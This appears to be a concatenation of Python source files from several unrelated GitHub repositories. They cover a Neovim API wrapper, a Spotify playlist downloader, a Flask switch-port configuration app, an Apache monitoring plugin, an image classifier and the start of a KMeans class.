# Function: window_get_width
# Parameters Window: window
# Returns Integer
# Recieves channel id False
# Can fail True
def get_width(self, window):
return self.send_sync(ReqMsg('window_get_width', *[window]))
# Function: window_set_width
# Parameters Window: window, Integer: width
# Returns void
# Recieves channel id False
# Can fail True
def set_width(self, window, width):
return self.send_sync(ReqMsg('window_set_width', *[window, width]))
# Function: window_get_var
# Parameters Window: window, String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_var(self, window, name):
return self.send_sync(ReqMsg('window_get_var', *[window, name]))
# Function: window_set_var
# Parameters Window: window, String: name, Object: value
# Returns Object
# Recieves channel id False
# Can fail True
def set_var(self, window, name, value):
return self.send_sync(ReqMsg('window_set_var', *[window, name, value]))
# Function: window_get_option
# Parameters Window: window, String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_option(self, window, name):
return self.send_sync(ReqMsg('window_get_option', *[window, name]))
# Function: window_set_option
# Parameters Window: window, String: name, Object: value
# Returns void
# Recieves channel id False
# Can fail True
def set_option(self, window, name, value):
return self.send_sync(ReqMsg('window_set_option', *[window, name, value]))
# Function: window_get_position
# Parameters Window: window
# Returns ArrayOf(Integer, 2)
# Recieves channel id False
# Can fail True
def get_position(self, window):
return self.send_sync(ReqMsg('window_get_position', *[window]))
# Function: window_get_tabpage
# Parameters Window: window
# Returns Tabpage
# Recieves channel id False
# Can fail True
def get_tabpage(self, window):
return self.send_sync(ReqMsg('window_get_tabpage', *[window]))
# Function: window_is_valid
# Parameters Window: window
# Returns Boolean
# Recieves channel id False
# Can fail False
def is_valid(self, window):
return self.send_sync(ReqMsg('window_is_valid', *[window]))
class Buffer(Cmd):
def __init__(self, session):
self._session = session
# Function: buffer_line_count
# Parameters Buffer: buffer
# Returns Integer
# Recieves channel id False
# Can fail True
def line_count(self, buffer):
return self.send_sync(ReqMsg('buffer_line_count', *[buffer]))
# Function: buffer_get_line
# Parameters Buffer: buffer, Integer: index
# Returns String
# Recieves channel id False
# Can fail True
def get_line(self, buffer, index):
return self.send_sync(ReqMsg('buffer_get_line', *[buffer, index]))
# Function: buffer_set_line
# Parameters Buffer: buffer, Integer: index, String: line
# Returns void
# Recieves channel id False
# Can fail True
def set_line(self, buffer, index, line):
return self.send_sync(ReqMsg('buffer_set_line', *[buffer, index, line]))
# Function: buffer_del_line
# Parameters Buffer: buffer, Integer: index
# Returns void
# Recieves channel id False
# Can fail True
def del_line(self, buffer, index):
return self.send_sync(ReqMsg('buffer_del_line', *[buffer, index]))
# Function: buffer_get_line_slice
# Parameters Buffer: buffer, Integer: start, Integer: end, Boolean: include_start, Boolean: include_end
# Returns ArrayOf(String)
# Recieves channel id False
# Can fail True
def get_line_slice(self, buffer, start, end, include_start, include_end):
return self.send_sync(ReqMsg('buffer_get_line_slice', *[buffer, start, end, include_start, include_end]))
# Function: buffer_set_line_slice
# Parameters Buffer: buffer, Integer: start, Integer: end, Boolean: include_start, Boolean: include_end, ArrayOf(String): replacement
# Returns void
# Recieves channel id False
# Can fail True
def set_line_slice(self, buffer, start, end, include_start, include_end, replacement):
return self.send_sync(ReqMsg('buffer_set_line_slice', *[buffer, start, end, include_start, include_end, replacement]))
# Function: buffer_get_var
# Parameters Buffer: buffer, String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_var(self, buffer, name):
return self.send_sync(ReqMsg('buffer_get_var', *[buffer, name]))
# Function: buffer_set_var
# Parameters Buffer: buffer, String: name, Object: value
# Returns Object
# Recieves channel id False
# Can fail True
def set_var(self, buffer, name, value):
return self.send_sync(ReqMsg('buffer_set_var', *[buffer, name, value]))
# Function: buffer_get_option
# Parameters Buffer: buffer, String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_option(self, buffer, name):
return self.send_sync(ReqMsg('buffer_get_option', *[buffer, name]))
# Function: buffer_set_option
# Parameters Buffer: buffer, String: name, Object: value
# Returns void
# Recieves channel id False
# Can fail True
def set_option(self, buffer, name, value):
return self.send_sync(ReqMsg('buffer_set_option', *[buffer, name, value]))
# Function: buffer_get_number
# Parameters Buffer: buffer
# Returns Integer
# Recieves channel id False
# Can fail True
def get_number(self, buffer):
return self.send_sync(ReqMsg('buffer_get_number', *[buffer]))
# Function: buffer_get_name
# Parameters Buffer: buffer
# Returns String
# Recieves channel id False
# Can fail True
def get_name(self, buffer):
return self.send_sync(ReqMsg('buffer_get_name', *[buffer]))
# Function: buffer_set_name
# Parameters Buffer: buffer, String: name
# Returns void
# Recieves channel id False
# Can fail True
def set_name(self, buffer, name):
return self.send_sync(ReqMsg('buffer_set_name', *[buffer, name]))
# Function: buffer_is_valid
# Parameters Buffer: buffer
# Returns Boolean
# Recieves channel id False
# Can fail False
def is_valid(self, buffer):
return self.send_sync(ReqMsg('buffer_is_valid', *[buffer]))
# Function: buffer_insert
# Parameters Buffer: buffer, Integer: lnum, ArrayOf(String): lines
# Returns void
# Recieves channel id False
# Can fail True
def insert(self, buffer, lnum, lines):
return self.send_sync(ReqMsg('buffer_insert', *[buffer, lnum, lines]))
# Function: buffer_get_mark
# Parameters Buffer: buffer, String: name
# Returns ArrayOf(Integer, 2)
# Recieves channel id False
# Can fail True
def get_mark(self, buffer, name):
return self.send_sync(ReqMsg('buffer_get_mark', *[buffer, name]))
class Tabpage(Cmd):
def __init__(self, session):
self._session = session
# Function: tabpage_get_windows
# Parameters Tabpage: tabpage
# Returns ArrayOf(Window)
# Recieves channel id False
# Can fail True
def get_windows(self, tabpage):
return self.send_sync(ReqMsg('tabpage_get_windows', *[tabpage]))
# Function: tabpage_get_var
# Parameters Tabpage: tabpage, String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_var(self, tabpage, name):
return self.send_sync(ReqMsg('tabpage_get_var', *[tabpage, name]))
# Function: tabpage_set_var
# Parameters Tabpage: tabpage, String: name, Object: value
# Returns Object
# Recieves channel id False
# Can fail True
def set_var(self, tabpage, name, value):
return self.send_sync(ReqMsg('tabpage_set_var', *[tabpage, name, value]))
# Function: tabpage_get_window
# Parameters Tabpage: tabpage
# Returns Window
# Recieves channel id False
# Can fail True
def get_window(self, tabpage):
return self.send_sync(ReqMsg('tabpage_get_window', *[tabpage]))
# Function: tabpage_is_valid
# Parameters Tabpage: tabpage
# Returns Boolean
# Recieves channel id False
# Can fail False
def is_valid(self, tabpage):
return self.send_sync(ReqMsg('tabpage_is_valid', *[tabpage]))
class Vim(Cmd):
def __init__(self, session):
self._session = session
# Function: vim_push_keys
# Parameters String: str
# Returns void
# Recieves channel id False
# Can fail False
def push_keys(self, v_str):
return self.send_sync(ReqMsg('vim_push_keys', *[v_str]))
# Function: vim_command
# Parameters String: str
# Returns void
# Recieves channel id False
# Can fail True
def command(self, v_str):
return self.send_sync(ReqMsg('vim_command', *[v_str]))
# Function: vim_feedkeys
# Parameters String: keys, String: mode
# Returns void
# Recieves channel id False
# Can fail False
def feedkeys(self, keys, mode):
return self.send_sync(ReqMsg('vim_feedkeys', *[keys, mode]))
# Function: vim_replace_termcodes
# Parameters String: str, Boolean: from_part, Boolean: do_lt, Boolean: special
# Returns String
# Recieves channel id False
# Can fail False
def replace_termcodes(self, v_str, from_part, do_lt, special):
return self.send_sync(ReqMsg('vim_replace_termcodes', *[v_str, from_part, do_lt, special]))
# Function: vim_eval
# Parameters String: str
# Returns Object
# Recieves channel id False
# Can fail True
def eval(self, v_str):
return self.send_sync(ReqMsg('vim_eval', *[v_str]))
# Function: vim_strwidth
# Parameters String: str
# Returns Integer
# Recieves channel id False
# Can fail True
def strwidth(self, v_str):
return self.send_sync(ReqMsg('vim_strwidth', *[v_str]))
# Function: vim_list_runtime_paths
# Parameters
# Returns ArrayOf(String)
# Recieves channel id False
# Can fail False
def list_runtime_paths(self, ):
return self.send_sync(ReqMsg('vim_list_runtime_paths', *[]))
# Function: vim_change_directory
# Parameters String: dir
# Returns void
# Recieves channel id False
# Can fail True
def change_directory(self, v_dir):
return self.send_sync(ReqMsg('vim_change_directory', *[v_dir]))
# Function: vim_get_current_line
# Parameters
# Returns String
# Recieves channel id False
# Can fail True
def get_current_line(self, ):
return self.send_sync(ReqMsg('vim_get_current_line', *[]))
# Function: vim_set_current_line
# Parameters String: line
# Returns void
# Recieves channel id False
# Can fail True
def set_current_line(self, line):
return self.send_sync(ReqMsg('vim_set_current_line', *[line]))
# Function: vim_del_current_line
# Parameters
# Returns void
# Recieves channel id False
# Can fail True
def del_current_line(self, ):
return self.send_sync(ReqMsg('vim_del_current_line', *[]))
# Function: vim_get_var
# Parameters String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_var(self, name):
return self.send_sync(ReqMsg('vim_get_var', *[name]))
# Function: vim_set_var
# Parameters String: name, Object: value
# Returns Object
# Recieves channel id False
# Can fail True
def set_var(self, name, value):
return self.send_sync(ReqMsg('vim_set_var', *[name, value]))
# Function: vim_get_vvar
# Parameters String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_vvar(self, name):
return self.send_sync(ReqMsg('vim_get_vvar', *[name]))
# Function: vim_get_option
# Parameters String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_option(self, name):
return self.send_sync(ReqMsg('vim_get_option', *[name]))
# Function: vim_set_option
# Parameters String: name, Object: value
# Returns void
# Recieves channel id False
# Can fail True
def set_option(self, name, value):
return self.send_sync(ReqMsg('vim_set_option', *[name, value]))
# Function: vim_out_write
# Parameters String: str
# Returns void
# Recieves channel id False
# Can fail False
def out_write(self, v_str):
return self.send_sync(ReqMsg('vim_out_write', *[v_str]))
# Function: vim_err_write
# Parameters String: str
# Returns void
# Recieves channel id False
# Can fail False
def err_write(self, v_str):
return self.send_sync(ReqMsg('vim_err_write', *[v_str]))
# Function: vim_report_error
# Parameters String: str
# Returns void
# Recieves channel id False
# Can fail False
def report_error(self, v_str):
return self.send_sync(ReqMsg('vim_report_error', *[v_str]))
# Function: vim_get_buffers
# Parameters
# Returns ArrayOf(Buffer)
# Recieves channel id False
# Can fail False
def get_buffers(self, ):
return self.send_sync(ReqMsg('vim_get_buffers', *[]))
# Function: vim_get_current_buffer
# Parameters
# Returns Buffer
# Recieves channel id False
# Can fail False
def get_current_buffer(self, ):
return self.send_sync(ReqMsg('vim_get_current_buffer', *[]))
# Function: vim_set_current_buffer
# Parameters Buffer: buffer
# Returns void
# Recieves channel id False
# Can fail True
def set_current_buffer(self, buffer):
return self.send_sync(ReqMsg('vim_set_current_buffer', *[buffer]))
# Function: vim_get_windows
# Parameters
# Returns ArrayOf(Window)
# Recieves channel id False
# Can fail False
def get_windows(self, ):
return self.send_sync(ReqMsg('vim_get_windows', *[]))
# Function: vim_get_current_window
# Parameters
# Returns Window
# Recieves channel id False
# Can fail False
def get_current_window(self, ):
return self.send_sync(ReqMsg('vim_get_current_window', *[]))
# Function: vim_set_current_window
# Parameters Window: window
# Returns void
# Recieves channel id False
# Can fail True
def set_current_window(self, window):
return self.send_sync(ReqMsg('vim_set_current_window', *[window]))
# Function: vim_get_tabpages
# Parameters
# Returns ArrayOf(Tabpage)
# Recieves channel id False
# Can fail False
def get_tabpages(self, ):
return self.send_sync(ReqMsg('vim_get_tabpages', *[]))
# Function: vim_get_current_tabpage
# Parameters
# Returns Tabpage
# Recieves channel id False
# Can fail False
def get_current_tabpage(self, ):
return self.send_sync(ReqMsg('vim_get_current_tabpage', *[]))
# Function: vim_set_current_tabpage
# Parameters Tabpage: tabpage
# Returns void
# Recieves channel id False
# Can fail True
def set_current_tabpage(self, tabpage):
return self.send_sync(ReqMsg('vim_set_current_tabpage', *[tabpage]))
# Function: vim_subscribe
# Parameters String: event
# Returns void
# Recieves channel id True
# Can fail False
def subscribe(self, event):
return self.send_sync(ReqMsg('vim_subscribe', *[event]))
# Function: vim_unsubscribe
# Parameters String: event
# Returns void
# Recieves channel id True
# Can fail False
def unsubscribe(self, event):
return self.send_sync(ReqMsg('vim_unsubscribe', *[event]))
# Function: vim_register_provider
# Parameters String: feature
# Returns void
# Recieves channel id True
# Can fail True
def register_provider(self, feature):
return self.send_sync(ReqMsg('vim_register_provider', *[feature]))
# Function: vim_get_api_info
# Parameters
# Returns Array
# Recieves channel id True
# Can fail False
def get_api_info(self, ):
return self.send_sync(ReqMsg('vim_get_api_info', *[]))
function_classes = {
'window': Window,
'buffer': Buffer,
'tabpage': Tabpage,
'vim': Vim,
}
```
|
{
"source": "jeffbuttars/pcm",
"score": 2
}
|
#### File: pcm/pcmpy/pcm.py
```python
import logging
# Set up the logger
logger = logging.getLogger('pcm')
# Use a console handler, set it to debug by default
logger_ch = logging.StreamHandler()
logger.setLevel(logging.INFO)
log_formatter = logging.Formatter(
('%(levelname)s: %(asctime)s %(processName)s:%(process)d'
' %(filename)s:%(lineno)s %(module)s::%(funcName)s()'
' -- %(message)s'))
logger_ch.setFormatter(log_formatter)
logger.addHandler(logger_ch)
import sys
import os
if __name__ == '__main__':
this_dir = os.path.realpath(os.path.dirname(__file__))
sys.path.insert(0, os.path.abspath(os.path.join(this_dir, "../")))
import argparse
from pcm import cmds
parser = argparse.ArgumentParser(
"pcm",
description=("Pacman Command Master")
)
parser.add_argument('-d',
'--debug',
default=False, action='store_true',
help=("Enable debug output and debug run mode")
)
# parser.add_argument('-c',
# '--config',
# default=None,
# help=("Specify a config file location.")
# )
def main():
sub_parser = parser.add_subparsers(help=("pcm commands"))
cmds.build_cmds(sub_parser)
args = parser.parse_args()
if args.debug:
logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
logger.debug("args: %s", args)
# import conf
# conf.load_settings(args.config)
# logger.debug("settings: %s", conf.settings)
if hasattr(args, 'func'):
return args.func(args)
parser.print_help()
# main()
if __name__ == '__main__':
main()
```
|
{
"source": "jeffbyrnes/newrelic-plugin-agent",
"score": 2
}
|
#### File: newrelic_plugin_agent/plugins/apache_httpd.py
```python
import logging
import re
from newrelic_plugin_agent.plugins import base
LOGGER = logging.getLogger(__name__)
PATTERN = re.compile(r'^([\w\s{1}]+):\s([\d\.{1}]+)', re.M)
class ApacheHTTPD(base.HTTPStatsPlugin):
DEFAULT_QUERY = 'auto'
GUID = 'com.meetme.newrelic_apache_httpd_agent'
KEYS = {'Total Accesses': {'type': '',
'label': 'Totals/Requests'},
'BusyWorkers': {'type': 'gauge',
'label': 'Workers/Busy'},
'Total kBytes': {'type': '',
'label': 'Totals/Bytes Sent',
'suffix': 'kb'},
'BytesPerSec': {'type': 'gauge',
'label': 'Bytes/Per Second',
'suffix': 'bytes/sec'},
'BytesPerReq': {'type': 'gauge',
'label': 'Requests/Average Payload Size',
'suffix': 'bytes'},
'IdleWorkers': {'type': 'gauge', 'label': 'Workers/Idle'},
'CPULoad': {'type': 'gauge', 'label': 'CPU Load'},
'ReqPerSec': {'type': 'gauge', 'label': 'Requests/Velocity',
'suffix': 'requests/sec'},
'Uptime': {'type': 'gauge', 'label': 'Uptime', 'suffix': 'sec'}}
def error_message(self):
LOGGER.error('Could not match any of the stats, please make ensure '
'Apache HTTPd is configured correctly. If you report '
'this as a bug, please include the full output of the '
'status page from %s in your ticket', self.stats_url)
def add_datapoints(self, stats):
"""Add all of the data points for a node
:param str stats: The stats content from Apache as a string
"""
matches = PATTERN.findall(stats or '')
for key, value in matches:
try:
value = int(value)
except ValueError:
try:
value = float(value)
except ValueError:
value = 0
if key in self.KEYS:
if self.KEYS[key].get('type') == 'gauge':
self.add_gauge_value(self.KEYS[key]['label'],
self.KEYS[key].get('suffix', ''),
value)
else:
self.add_derive_value(self.KEYS[key]['label'],
self.KEYS[key].get('suffix', ''),
value)
else:
LOGGER.warning('Found unmapped key/value pair: %s = %s',
key, value)
```
|
{
"source": "jeffc71/rank_structured_cholesky",
"score": 2
}
|
#### File: work/matrices/runnerv0.py
```python
import os
import sys
import numpy as np
import scipy.io as sio
import gzip
# BUILD_PATH="../../../../rsc-build"
BUILD_PATH="/Users/dbindel/local/rsc/bin"
def mat_to_bcsm(basename, write_rhs=True):
"""Write UF sparse collection .mat file to internal format.
NB: We probably ought to just hook up a Python front-end to the solver.
"""
m = sio.loadmat('{0}.mat'.format(basename))
problem = m['Problem']
A = problem['A'][0,0]
# nnz, m, n are uint64; offsets/indices are int32; data is double
with gzip.open('{0}_system.bcsm.gz'.format(basename), 'wb') as f:
hdr = np.array([A.nnz, A.shape[0], A.shape[1]], dtype=np.uint64)
f.write(hdr.tostring())
f.write(A.indptr.tostring())
f.write(A.indices.tostring())
f.write(A.data.tostring())
if write_rhs:
if 'b' in problem:
b = problem['b'][0,0][:,0]
else:
b = np.ones((A.shape[0],))
with open('{0}_rhs.vector'.format(basename), 'wb') as f:
hdr = np.array([A.shape[0]], dtype=np.int32)
f.write(hdr)
f.write(b)
def download(collection, basename):
baseURL = 'http://www.cise.ufl.edu/research/sparse/mat/'
matname = '{0}.mat'.format(basename)
if not os.path.exists(matname):
assert collection is not None, "Invalid collection for download"
os.system('wget {0}/{1}/{2}.mat'.format(baseURL, collection, basename))
def setup(collection, basename):
download(collection, basename)
if not os.path.exists('{0}_system.bcsm.gz'.format(basename)):
mat_to_bcsm(basename)
def run(collection, basename):
setup(collection, basename)
rundir = '{0}_run'.format(basename)
if not os.path.exists(rundir):
os.mkdir(rundir)
os.chdir(rundir)
os.system('{0}/pcg_solver ../{1}'.format(BUILD_PATH, basename))
if __name__ == "__main__":
cmds = {'run': run, 'download': download, 'setup': setup}
if len(sys.argv) == 3:
cmd, name = sys.argv[1:]
name_parts = name.split('/')
assert len(name_parts) <= 2, 'Invalid name'
if len(name_parts) == 2:
collection = name_parts[0]
basename = name_parts[1]
else:
collection = None
basename = name_parts[0]
cmds[cmd](collection, basename)
else:
print("Format: translate.py command matname")
```
|
{
"source": "JeffCarpenter/spotify-playlist-downloader",
"score": 3
}
|
#### File: spotify-playlist-downloader/download_spotify_playlist/download.py
```python
import os
import csv
import eyed3
import argparse
import youtube_dl
import spotipy
import spotipy.util as util
from unidecode import unidecode
def get_songs_from_csvfile(csvfile, args):
songs = []
with open(csvfile, 'r') as csvfile:
reader = csv.reader(csvfile)
next(reader) # Skip the first line
if args.skip:
print('Skipping', args.skip, 'songs')
for i in range(args.skip):
next(reader)
for row in reader:
songs.append({
'name': unidecode(row[0]).strip(),
'artist': unidecode(row[1]).strip(),
'album': unidecode(row[2]).strip()
})
return songs
class MyLogger(object):
def debug(self, msg):
pass
def warning(self, msg):
pass
def error(self, msg):
print(msg)
def download_finish(d):
if d['status'] == 'finished':
print('\x1b[1A\x1b[2K')
print("\x1b[1A[\033[93mConverting\033[00m] %s" % d['filename'])
def download_songs(songs, folder):
for song in songs:
probable_filename = folder + '/' + song['name'] + ' - ' + \
song['artist'] + '.mp3'
if os.path.isfile(probable_filename):
# The file may already be there, so skip
print('[\033[93mSkipping\033[00m] %s by %s' % \
(song['name'], song['artist']))
continue
opts = {
'format': 'bestaudio/best',
'forcejson': True,
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '256',
}],
# 'verbose': True,
'progress_hooks': [download_finish],
'logger': MyLogger(),
'outtmpl': folder + '/' + song['name'] + ' - ' + song['artist'] + '.%(ext)s'
}
url = ' '.join([song['name'], song['artist'], 'audio', 'youtube'])
url = 'ytsearch:' + url
print('[\033[91mFetching\033[00m] %s' % probable_filename)
with youtube_dl.YoutubeDL(opts) as ydl:
ydl.download([url])
if os.path.isfile(probable_filename):
afile = eyed3.load(probable_filename)
afile.tag.title = song['name']
afile.tag.artist = song['artist']
afile.tag.album = song['album']
afile.tag.save()
else:
print('\x1b[1A\x1b[2K')
print('\x1b[1A[\033[91mMetadata\033[00m] Could not set metadata for %s\nTemp' % \
probable_filename)
print('\x1b[1A\x1b[2K')
print('\x1b[1A[\033[92mDownloaded]\033[00m', song['name'], '-', song['artist'])
def get_songs_from_playlist(tracks, args):
songs = []
for item in tracks['items'][args.skip:]:
track = item['track']
songs.append({
'name': unidecode(track['name']).strip(),
'artist': unidecode(track['artists'][0]['name']).strip(),
'album': unidecode(track['album']['name']).strip()
})
return songs
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--folder', help="keep the files in the folder specified")
parser.add_argument('-c', '--create', help="try to create folder if doesn't exist",
action="store_true")
parser.add_argument('--skip', help="number of songs to skip from the start of csv",
type=int)
group = parser.add_mutually_exclusive_group()
group.add_argument('-csv', help="input csv file")
group.add_argument('-username', help="username of your spotify account")
args = parser.parse_args()
# getting current working directory
folder = os.path.dirname(os.path.realpath(__file__))
if args.folder:
if os.path.isdir(args.folder):
folder = os.path.abspath(args.folder)
elif args.create:
try:
os.makedirs(args.folder)
folder = os.path.abspath(args.folder)
except e:
print('Error while creating folder')
raise
else:
print('No such folder. Aborting..')
exit()
print('Storing files in', folder)
if args.csv:
if os.path.isfile(args.csv):
csvfile = args.csv
songs = get_songs_from_csvfile(csvfile, args)
download_songs(songs, folder)
else:
print('No such csv file. Aborting..')
exit()
if args.username:
scope = 'playlist-read playlist-read-private'
token = util.prompt_for_user_token(args.username, scope)
if token:
sp = spotipy.Spotify(auth=token)
try:
playlists = sp.user_playlists(args.username)
except spotipy.client.SpotifyException:
print("Invalid Username")
exit()
if len(playlists) > 0:
print("All Playlists: ")
for index, playlist in enumerate(playlists['items']):
print(str(index + 1) + ": " + playlist['name'])
n = input("Enter S.N. of playlists (seprated by comma): ").split(",")
if n:
for i in range(0, len(n), 2):
playlist_folder = folder+"/"+playlists['items'][int(n[i]) - 1]['name']
print('Storing files in', playlist_folder)
if not os.path.isdir(playlist_folder):
try:
os.makedirs(playlist_folder )
except e:
print('Error while creating folder')
raise
playlist_id = playlists['items'][int(n[i]) - 1]['id']
tracks = sp.user_playlist(args.username, playlist_id,
fields="tracks,next")['tracks']
songs = get_songs_from_playlist(tracks, args)
download_songs(songs, playlist_folder )
else:
print("No S.N. Provided! Aborting...")
else:
print("No Playlist Found!")
else:
print("Can't get token for", username)
exit()
if __name__ == '__main__':
main()
```
|
{
"source": "Jeff-Carrell/API-Switch-Demo",
"score": 2
}
|
#### File: Jeff-Carrell/API-Switch-Demo/web.py
```python
from flask import Flask, redirect, url_for, flash
from flask import render_template
from flask import request
from aoss import loginOS, ports, vlan
import json
from requests.packages.urllib3 import disable_warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
disable_warnings(InsecureRequestWarning)
#
# This section is no longer used. Please go to http://127.0.0.1:5000/config
# to configure this web frontend. You can also edit config.json, though
# the above web frontend is best.
#
# Open config file for usernae, password, switch, ignored vlans, etc
with open('config.json') as lf:
data = json.load(lf)
app = Flask(__name__)
app.secret_key = 'EF657435D29A74A40A96B5AF3792AD0D322BE69EAC77DFE13CF23B3B46201970'
@app.route('/get_ports')
def get_ports():
# data = {"user": username, "password": password, "ipadd": switch_ip}
with open('config.json') as lf:
data = json.load(lf)
baseurl = "https://{}/rest/v4/".format(data['ipadd'])
cookie_header = loginOS.login_os(data, baseurl)
listvlans = vlan.get_vlan(baseurl, cookie_header)['vlan_element']
listports = ports.get_ports(baseurl, cookie_header)
listvlansports = vlan.get_vlans_ports(baseurl, cookie_header)
useablevlans = []
for lvlan in listvlans:
if str(lvlan['vlan_id']) not in data['ignored_vlans']:
useablevlans.append({'vlan_id': lvlan['vlan_id'], 'vlan_name': lvlan['name']})
def test_get_ports():
cookie_header = loginOS.login_os(data, baseurl)
loginOS.logout(baseurl, cookie_header)
numberofports = listports['collection_result']['total_elements_count']
loginOS.logout(baseurl, cookie_header)
port_status = data['port_status']
title = data['title']
return render_template('ports.html', title=title, ports=listports['port_element'],
listvlansports=listvlansports['vlan_port_element'],
vlans=listvlans, numofports=numberofports,
useablevlans=useablevlans, port_status=port_status, data=data)
@app.route("/")
def root():
title=data['title']
return render_template('index.html', title=title)
@app.route('/portsetup')
def port_setup():
results = "Port Config"
return render_template('port_setup.html', title='Port Configuration', results=results)
@app.route('/ivlan_config', methods=['GET', 'POST'])
def ivlan_config():
if request.method == 'POST':
with open('config.json') as f:
data = json.load(f)
baseurl = "https://{}/rest/v4/".format(data['ipadd'])
cookie_header = loginOS.login_os(data, baseurl)
loginOS.logout(baseurl, cookie_header)
ivlans = request.form.getlist('ivlans')
newdata = {}
newdata['user'] = data['user']
newdata['password'] = data['password']
newdata['ipadd'] = data['ipadd']
newdata['title'] = data['title']
newdata['ignored_vlans'] = ivlans
newdata['port_status'] = data['port_status']
newdata['port_start'] = data['port_start']
newdata['port_end'] = data['port_end']
with open('config.json', 'w') as fp:
json.dump(newdata, fp)
flash('Ignored VLANS successfully updated')
with open('config.json') as f:
data = json.load(f)
baseurl = "https://{}/rest/v4/".format(data['ipadd'])
cookie_header = loginOS.login_os(data, baseurl)
listvlans = vlan.get_vlan(baseurl, cookie_header)['vlan_element']
loginOS.logout(baseurl, cookie_header)
av = []
for lv in listvlans:
av.append(lv['vlan_id'])
ignored = list(map(int, data['ignored_vlans']))
av_c = {}
for a in av:
if a in ignored:
av_c[a] = True
else:
av_c[a] = False
return render_template('ivlan_config.html', title='Config Demo', data=data, ignored=ignored, allvlans=listvlans, avc=av_c)
@app.route('/config', methods=['GET', 'POST'])
def config():
if request.method == 'POST':
with open('config.json') as f:
data = json.load(f)
newdata = {}
user = request.form.get('user')
port_status = request.form.get('port_status')
ipadd = request.form.get('ipadd')
title = request.form.get('title')
ivlans = request.form.getlist('ivlans')
if request.form.get('password') is None or request.form.get('password') == "":
password = data['password']
else:
password = request.form.getlist('password')
newdata['port_start'] = request.form.get('port_start')
newdata['port_end'] = request.form.get('port_end')
newdata['user'] = user
newdata['password'] = password
newdata['ipadd'] = ipadd
newdata['title'] = title
newdata['ignored_vlans'] = data['ignored_vlans']
newdata['port_status'] = port_status
with open('config.json', 'w') as fp:
json.dump(newdata, fp)
flash('Configuration successfully updated')
with open('config.json') as f:
data = json.load(f)
return render_template('config.html', title='Config Demo', data=data)
@app.route('/port_update', methods=['GET', 'POST'])
def port_update():
# data = {"user": user, "password": password, "ipadd": switch_ip}
baseurl = "https://{}/rest/v4/".format(data['ipadd'])
cookie_header = loginOS.login_os(data, baseurl)
if request.method == 'POST':
requestmethod = request.form
port_id = request.form.get('port_id')
newvlan = int(request.form.get('newvlan'))
# {'vlan_id': 102, 'port_id': 'trk1', 'port_mode': 'POM_TAGGED_STATIC'},
vlanport = {'vlan_id': newvlan, 'port_id': port_id, 'port_mode': 'POM_UNTAGGED'}
response = vlan.create_vlan_with_port(baseurl, vlanport, cookie_header)
title = "Port Config"
loginOS.logout(baseurl, cookie_header)
return redirect(url_for('get_ports', title=title))
# return render_template('port_setup.html', title='Port Configuration', results=results)
if __name__ == "__main__":
app.run(debug=True, host='0.0.0.0', port=5000)
```
|
{
"source": "jeff-carter/FlowerImageClassifier",
"score": 3
}
|
#### File: jeff-carter/FlowerImageClassifier/predict.py
```python
import util
import checkpoint
import numpy as np
import torch
import json
from PIL import Image
def main():
'''
The main method of train.py
'''
args = util.get_predict_args()
np_image = process_image(args.path_to_image)
if (args.device == 'cuda'):
t_image = torch.from_numpy(np_image).type(torch.cuda.FloatTensor).unsqueeze(0)
else:
t_image = torch.from_numpy(np_image).type(torch.FloatTensor).unsqueeze(0)
model = checkpoint.load(args.checkpoint)[0]
model.to(args.device)
model.eval()
with torch.no_grad():
logps = model.forward(t_image)
ps = torch.exp(logps)
top_p, top_class = ps.topk(args.top_k, dim=1)
np_top_p, np_top_class = top_p.cpu().numpy(), top_class.cpu().numpy()
if args.category_names:
with open(args.category_names, 'r') as f:
cat_to_name = json.load(f)
for (x, y), value in np.ndenumerate(np_top_class):
print(f"Name: {cat_to_name.get(str(value))},\tCertainty: {np_top_p[x][y]:.5f}")
else:
for (x, y), value in np.ndenumerate(np_top_class):
print(f"Class: {value},\tCertainty: {np_top_p[x][y]:.5f}")
def process_image(image_path):
''' Scales, crops, and normalizes a PIL image for a PyTorch model,
returns an Numpy array
Parameters:
image_path - the file path of the image
Returns:
np_image - the processed image as a numpy array
'''
# Process a PIL image for use in a PyTorch model
image = Image.open(image_path)
image.thumbnail((256, 256))
width, height = image.size
new_width, new_height = 224, 224
left = (width - new_width)/2
upper = (height - new_height)/2
right = left + new_width
lower = upper + new_height
image = image.crop((left, upper, right, lower))
mean_colors = np.array([0.485, 0.456, 0.406])
std_dev_colors = np.array([0.229, 0.224, 0.225])
np_image = np.array(image) / 255
np_image = (np_image - mean_colors) / std_dev_colors
np_image = np_image.transpose((2, 0, 1))
return np_image
if __name__ == '__main__':
main()
```
|
{
"source": "jeffcarter-github/MachineLearningLibrary",
"score": 3
}
|
#### File: MachineLearningLibrary/Cluster/KMeans.py
```python
import numpy as np
from scipy import stats
class KMeans(object):
def __init__(self, n_clusters, init='kmeans++', max_iter=300,
random_state=None):
self.n_clusters = n_clusters
self.init = init
self.max_iter = max_iter
self.random_state = random_state
self.n_samples = None
self.n_features = None
self.cluster_centers = None
self.inertia = None
if self.n_clusters < 2:
raise ValueError()
if self.init not in ['forgy', 'random', 'kmeans++']:
raise ValueError()
if self.max_iter <= 0:
raise ValueError()
if self.random_state:
if not isinstance(self.random_state, int):
raise ValueError()
else:
np.random.seed(self.random_state)
def _check_data(self, X):
if not isinstance(X, np.ndarray):
raise ValueError()
else:
self.n_samples, self.n_features = X.shape
if self.n_clusters > self.n_samples:
raise ValueError()
def _init_clusters(self, X):
if self.init == 'forgy':
idx = np.random.randint(0, self.n_samples, self.n_clusters)
self.cluster_centers = X[idx, :]
elif self.init == 'random':
assignments =\
np.argmin(np.random.rand(self.n_clusters, self.n_samples), axis=0)
self.cluster_centers =\
np.array([np.average(X[assignments == i], axis=0)
for i in range(self.n_clusters)])
elif self.init == 'kmeans++':
c_k = np.random.choice(range(X.shape[0]), 1)
self.cluster_centers = [X[c_k]]
